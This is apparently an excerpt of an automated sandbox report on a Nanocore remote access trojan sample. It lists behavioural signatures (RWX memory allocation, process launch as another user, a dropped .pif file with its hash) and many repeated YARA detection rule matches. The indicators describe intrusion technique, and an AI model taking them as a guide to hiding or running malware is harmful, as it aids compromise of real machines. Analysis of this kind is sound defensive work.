Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BFE6	6_2_0092BFE6
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00933788	13_2_00933788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_009343A0	13_2_009343A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00934458	13_2_00934458

Contains functionality to launch a process as a different user

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

5_2_00FF6219

PE file contains strange resources

Source: mmuiqlcvwo.pif.4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll	Jump to behavior

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Yara signature match

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
